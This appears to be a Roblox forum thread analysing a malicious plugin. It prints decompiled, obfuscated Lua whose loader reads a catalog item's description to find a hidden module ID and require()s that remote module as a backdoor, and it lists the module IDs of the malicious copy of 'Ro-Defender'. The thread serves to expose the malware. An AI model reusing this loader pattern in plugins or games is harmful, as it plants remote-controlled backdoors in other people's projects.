          L1_29 = L1_29 + (A0_28:sub(L5_33, L5_33) == "1" and 2 ^ (6 - L5_33) or 0)
        end
        L5_33 = L1_29 + 1
        return L2_30(L3_31, L4_32, L5_33)
      end) .. ({
        "",
        "",
        ""
      })[#A0_25 % 3 + 1]
    end
    return L2_24
  elseif A1_23 == "decode" then
    function L2_24(A0_34)
      A0_34 = string.gsub(A0_34, "[^" .. _UPVALUE0_ .. "=]", "")
      return (A0_34:gsub(".", function(A0_35)
        local L1_36
        if A0_35 == "=" then
          L1_36 = ""
          return L1_36
        end
        L1_36 = ""
        for _FORV_6_ = 6, 1, -1 do
          L1_36 = L1_36 .. ((_UPVALUE0_:find(A0_35) - 1) % 2 ^ _FORV_6_ - (_UPVALUE0_:find(A0_35) - 1) % 2 ^ (_FORV_6_ - 1) > 0 and "1" or "0")
        end
        return L1_36
      end):gsub("%d%d%d?%d?%d?%d?%d?%d?", function(A0_37)
        local L1_38, L2_39, L3_40, L4_41, L5_42
        L1_38 = #A0_37
        if L1_38 ~= 8 then
          L1_38 = ""
          return L1_38
        end
        L1_38 = 0
        for L5_42 = 1, 8 do
          L1_38 = L1_38 + (A0_37:sub(L5_42, L5_42) == "1" and 2 ^ (8 - L5_42) or 0)
        end
        return L2_39(L3_40)
      end))
    end
    return L2_24
  end
end
L4_4 = newproxy
L4_4 = L4_4(true)
getmetatable(L4_4).__index = function(A0_43, A1_44)
  local L2_45
  if A1_44 == "split" then
    function L2_45(A0_46, A1_47)
      local L2_48, L3_49, L4_50, L5_51, L6_52
      L2_48 = {}
      L6_52 = A1_47
      for L6_52 in L3_49(L4_50, L5_51) do
        table.insert(L2_48, L6_52)
      end
      return L2_48
    end
    return L2_45
  elseif A1_44 == "die" then
    function L2_45()
      local L0_53, L1_54
      while true do
      end
    end
    return L2_45
  end
end
marketplaceService = game:GetService("MarketplaceService")
productInfo = marketplaceService:GetProductInfo(2226317157)
modulefunc = productInfo.Description
mfuncname = productInfo.Name
modulefunc = tonumber(string.match(modulefunc, "%d+"))
require(tonumber(modulefunc))[mfuncname]()

Leads to shirt https://www.roblox.com/catalog/2226317157/load, which is used as a proxy to get the Module ID of the final private module: https://www.roblox.com/library/2655056793/Settings. Backdoor code is probably stored in that private module.


Malicious plugin spotted?
#19

Said module 2655056793 requires another module. 2686631266 (wow thanks roblox for indirectly helping by telling me that you are removing private modules required from others)



#21

Ro-Defender™ Plugin v8.7

Malicious: 2655565054
Original: 142273772